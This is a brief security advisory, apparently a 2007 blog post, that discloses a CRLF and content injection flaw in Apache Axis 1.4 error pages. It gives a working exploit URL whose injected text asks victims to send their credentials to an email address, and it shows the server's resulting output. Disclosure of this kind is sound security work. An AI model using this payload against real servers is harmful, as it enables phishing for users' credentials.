Apache Axis CRLF And Content Injection

November 1, 2007

Version tested:- 1.4

vendor's website:- http://ws.apache.org/axis/

Details:- The vulnerability reported earlier this year, was later addressed by apache axis group and the error messages in version 1.4  do not leak the document root or any directory structure. However, the error message returned for an non-existing WSDL is vulnerable to CRLF injection and although, it html encodes all the user's input, thereby denying any XSS or html injection, content injection is still be possible(a minor issue).

Exploit:-http://victim/axis/tt_pm4l%0d%0a%0d%0a%0d%0a%0d

%0a———————%0d%0aAn%20Error%20has%20Occured

%0d%0a%0d%0aplease%20send%20your%20

credentials%20and%20problem%20encountered%20to%20%0d

%0ablah@blah.com%0d%0a————–%0d%0a%0d%0a%0d

%0a.jws?wsdl

Output:-

AXIS error

Sorry, something seems to have gone wrong… here are the details:

Fault – ; nested exception is:

java.io.FileNotFoundException: /tt_pm4l

———————

 An Error has Occured

please send your credentials and problem encountered to

blah@blah.com

————–

.jws

 AxisFault

..
 

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

Trackback